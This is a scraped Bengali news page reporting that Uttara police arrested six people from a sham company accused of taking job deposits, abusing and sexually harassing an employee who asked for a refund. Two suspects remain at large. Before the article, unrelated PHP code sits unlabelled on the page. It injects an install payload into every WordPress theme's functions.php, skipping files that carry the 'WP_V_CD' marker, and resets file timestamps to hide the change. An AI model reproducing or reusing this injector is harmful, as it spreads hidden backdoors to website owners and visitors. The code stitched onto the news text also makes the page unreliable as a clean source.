if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){ if (strpos($content, 'WP_V_CD') === false){ $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } ?>
মঙ্গলবার রাতে ভুক্তভোগীর অভিযোগের ভিত্তিতে উত্তরা ৩ নং সেক্টর ৮ নং রোডের ১০নং বাড়ির ফেমাস কর্পোরেশন প্রাইভেট লিমিটেড নামের ভুঁইফোড় প্রতিষ্ঠানে অভিযান চালিয়ে এই প্রতারকদের আটক করে থানায় নিয়ে আসে পুলিশ।
আটককৃতরা হলো- মোহাম্মদ রবিউল ইসলাম(৩৫), গোলাম রাববানী(৩০), নুরে আলম সিদ্দিকী (৩১), নিরব(৩০), হাসান(৩৬) এবং হাবিবুর রহমান (২০)। এ সময় ঘটনাস্থল থেকে কৌশলে আরও দুইজন পালিয়ে যায়।
প্রতারণার শিকার ভুক্তভোগী ফারজানা আক্তার অবজারভার অনলাইন প্রতিনিধিকে জানান, পরিচিত এক ব্যক্তির মাধ্যমে উত্তরার ফেমাস কর্পোরেশন প্রাইভেট লিমিটেড নামের প্রতিষ্ঠানে ৪০,০০০ টাকা জামানত দিয়ে ১০ হাজার টাকা বেতনে চাকুরীতে যোগদান করি। পরবর্তীতে কর্তৃপক্ষের দাবি মেটানোর জন্য আরও দুজন পরিচিত ব্যক্তিকে এই প্রতিষ্ঠানে চাকুরীর জন্য নিয়ে আসি। তারা দুজনে আশি হাজার টাকা দেয়। সর্বমোট ১ লাখ ২০ হাজার টাকা জামানত নেয়ার পরও কোন চাকুরীর ব্যবস্থা করে দিতে পারেনি এই ভুঁইফোড় প্রতিষ্ঠান। পরবর্তীতে ৩ মাস পর বেতন ও জামানতের টাকা ফেরত চাওয়াতেই অমানুষিক নির্যাতন ও যৌন হয়রানি শুরু করে প্রতারকরা।
পরে এঘটনায় উত্তরা পশ্চিম থানায় ৮ জনের বিরুদ্ধে একটি প্রতারণার মামলা দায়ের করলে পুলিশ ৬ জনকে আটক করে। তবে প্রতিষ্ঠানটির চেয়ারম্যান মর্তুজা ও সানাউল্লাহকে আটক করতে পারেনি পুলিশ।
উত্তরা পশ্চিম থানার ওসি তদন্ত আব্দুর রাজ্জাক আটকের ঘটনা নিশ্চিত করে বলেন, মামলার পর আটককৃত ৬ প্রতারককে বুধবার সকালে আদালতে পাঠানো হয়েছে। পলাতক ২ প্রতারককে ধরতে চেষ্টা চালানো হচ্ছে।
About Us Contact Privacy & Policy DMCA Sitemap
© সর্বস্বত্ব স্বত্বাধিকার সংরক্ষিত | সেরা নিউজ টুয়েন্টিফোর ডটকম -২০১৮